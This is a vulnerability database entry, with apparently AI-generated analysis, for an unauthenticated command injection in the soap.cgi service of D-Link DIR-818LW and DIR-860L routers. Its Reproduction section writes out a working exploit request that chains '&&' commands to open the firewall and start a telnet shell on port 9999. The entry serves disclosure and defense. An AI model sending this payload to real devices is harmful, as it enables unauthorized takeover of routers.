CVE-2018-20114
Description
On D-Link DIR-818LW Rev.A 2.05.B03 and DIR-860L Rev.B 2.03.B03 devices, unauthenticated remote OS command execution can occur in the soap.cgi service of the cgibin binary via an "&&" substring in the service parameter. NOTE: this issue exists because of an incomplete fix for CVE-2018-6530.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Unauthenticated remote command injection via '&&' in the soap.cgi service parameter on D-Link DIR-818LW Rev.A and DIR-860L Rev.B allows full device compromise.
Vulnerability
The vulnerability is an OS command injection in the soapcgi_main function of the cgibin binary on D-Link DIR-818LW Rev.A firmware version 2.05.B03 and DIR-860L Rev.B firmware version 2.03.B03 [1]. The soap.cgi endpoint, accessible on TCP port 49152, accepts a service GET parameter. An unauthenticated remote attacker can inject arbitrary shell commands by including an && substring in the service parameter. This issue is an incomplete fix for CVE-2018-6530, where some character sanitization via strchr was added but failed to filter the && sequence [1].
Exploitation
An attacker can send a crafted HTTP POST request to http://:49152/soap.cgi with a malicious service parameter containing && followed by shell commands. No authentication is required. The reference includes a proof of concept (PoC) that chains multiple commands to disable iptables rules and start a telnetd listener on port 9999, then connect via telnet [1]. The attacker only needs network access to the device's port 49152.
Impact
Successful exploitation allows an unauthenticated remote attacker to execute arbitrary OS commands with full system privileges on the affected D-Link routers [1]. This can lead to complete compromise of the device, including data exfiltration, installation of malware, or use of the router as a pivot point in further network attacks.
Mitigation
As of the publication date (January 2, 2019), D-Link had not released a firmware update that fully addresses this vulnerability [1]. Users should monitor D-Link's support website for firmware patches or consider disabling remote management and restricting access to port 49152 via firewall rules as a workaround. The affected devices may be end-of-life; users should evaluate upgrading to newer, supported hardware.
AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
2Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"Incomplete input sanitization in the soapcgi_main function allows the && shell metacharacter sequence to bypass the strchr-based filter added for CVE-2018-6530."
Attack vector
An unauthenticated remote attacker sends an HTTP POST request to the `/soap.cgi` endpoint on TCP port 49152. The `service` GET parameter is not fully sanitized; although a prior fix for CVE-2018-6530 added character filtering via `strchr`, the `&&` substring was not blocked [ref_id=1]. By injecting `&&` followed by arbitrary shell commands into the `service` parameter, the attacker achieves OS command injection. The PoC demonstrates chaining multiple `iptables` commands to open firewall rules and then launching `telnetd` on port 9999 for interactive shell access [ref_id=1].
Affected code
The vulnerability resides in the `soapcgi_main` function of the `cgibin` binary. The affected firmware versions are DIR-818LW_REVA 2.05.B03 and DIR-860L_REVB 2.03.B03 [ref_id=1].
What the fix does
No patch is provided in the bundle. The advisory notes that the vendor attempted to fix a similar vulnerability (CVE-2018-6530) by adding character sanitization with `strchr`, but the filter was incomplete because it did not block the `&&` substring [ref_id=1]. To remediate, the vendor would need to extend the input validation in `soapcgi_main` to reject or escape the `&&` sequence and other shell metacharacters in the `service` parameter.
Preconditions
- configThe target device must be running DIR-818LW_REVA firmware 2.05.B03 or DIR-860L_REVB firmware 2.03.B03
- networkThe attacker must have network access to TCP port 49152 on the device
- authNo authentication is required
- inputThe attacker sends a crafted HTTP POST request with shell metacharacters in the service parameter
Reproduction
1. Connect to the target device on port 49152 using netcat: `nc 192.168.0.1 49152` 2. Send the following HTTP POST request: ``` POST /soap.cgi?service=&&iptables -P INPUT ACCEPT&&iptables -P FORWARD ACCEPT&&iptables -P OUTPUT ACCEPT&&iptables -t nat -P PREROUTING ACCEPT&&iptables -t nat -P OUTPUT ACCEPT&&iptables -t nat -P POSTROUTING ACCEPT&&telnetd -p 9999&& HTTP/1.1 Host: 192.168.0.1:49152 Accept-Encoding: identity Content-Length: 16 SOAPAction: "whatever-serviceType#whatever-action" Content-Type: text/xml ``` 3. Connect to the spawned telnet shell: `telnet 192.168.0.1 9999` [ref_id=1]
Generated on May 25, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
1- github.com/pr0v3rbs/CVE/tree/master/CVE-2018-20114mitrex_refsource_MISC
News mentions
0No linked articles in our index yet.